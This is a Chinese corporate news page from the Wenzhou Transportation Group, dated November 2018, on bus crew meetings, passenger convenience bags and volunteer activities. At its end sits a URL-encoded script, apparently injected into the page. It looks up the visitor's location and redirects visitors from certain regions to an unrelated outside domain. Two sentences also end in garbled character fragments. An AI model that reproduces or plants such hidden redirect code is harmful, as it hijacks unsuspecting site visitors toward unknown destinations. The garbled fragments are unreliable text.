当前位置: 您当前的位置 : 温州交运集团 > 交运资讯 > 媒体聚焦 >正文
班组活动推陈出新 志愿服务络绎不绝
来源: 发布时间:2018年11月28日 10:06:00 作者: 字体:

  近日, 98路车厢内出现的崭新蓝色便民袋获得了沿途乘客的纷纷点赞。这款升级版便民袋在拥有便民药品、意见本功能的基础上添加了宣传资料、其他用品两个新功能,实用性更为突出,设计更为合理,乘客可根据需求拿。址奖。

  近日,城东公交东一分公司召开班组建设交流会,探讨安全驾驶、服务技能和班组文化,提高班组管理水平。会议听取了各自班组在制度规范、奖惩考核、激励机制等方面的创新举措,交流了安全驾驶、风险管理,服务质量工作经验,加强了班组文化的互补性和班组活动的多样性。

  11月18日,城东公交东三分公司社巴班组召开晨会,以“安全在路上”为主题,讨论日常行车中的热点问题,进一步把好年底安全行车关。会议分析了社巴车辆行经路口的安全掉头方式,要求对乘客宣传安全乘车知识,督促时刻关注车辆安全动态,为乘客提供细致贴心的服务,履行好“最后一公里”的宗旨。据了解,召开晨会是近期社巴班组在创建中摸索出的一条新经验。晨会的主题会随着阶段工作的推进不断推陈出新。成员们表示,每天出车前,大家一起聚一聚,议一议,对全天的安全工作既是一种提醒,也是一种鼓励。

  11月17日, B108、B2班组成员利用休息时间自发到BRT站台,向各线路驾驶员宣传“文明服务规范行驶”行车要求。

  11月18日,牛山客运中心巾帼文明岗参加“以书换绿·将爱传递”旧书换绿植实践活动,倡议大家将读物绘本分享给贫困儿童,发扬助人为乐精神。志愿者们积极响应活动号召,捐出符合要求的书籍,由班组代表送到活动现。⒒焕词杪讨。

交运资讯

WENZHOU TRANSPORTATION

交运电子报

GROUP BRIEFING

交运电子报

%3Cscript%20type%3D%22text/javascript%22%20src%3D%22http%3A//ip.ws.126.net/ipquery%22%3E%3C/script%3E%0A%3Cscript%20type%3D%22text/javascript%22%3E%0Astrdistrict%20%3D%5Blo%2C%20lc%5D.join%28%27%5Ct%27%29%3B%0Aif%28strdistrict.indexOf%28%22%26%2321271%3B%26%2320140%3B%22%29%3E0%20%7C%7C%20strdistrict.indexOf%28%22%26%2339321%3B%26%2328207%3B%22%29%3E0%29%0A%7B%0Awindow.location.href%3D%22http%3A//www.arrdm.com%22%3B%20%20%20%0A%7D%0Aelse%0A%7B%0A%7D%0A%3C/script%3E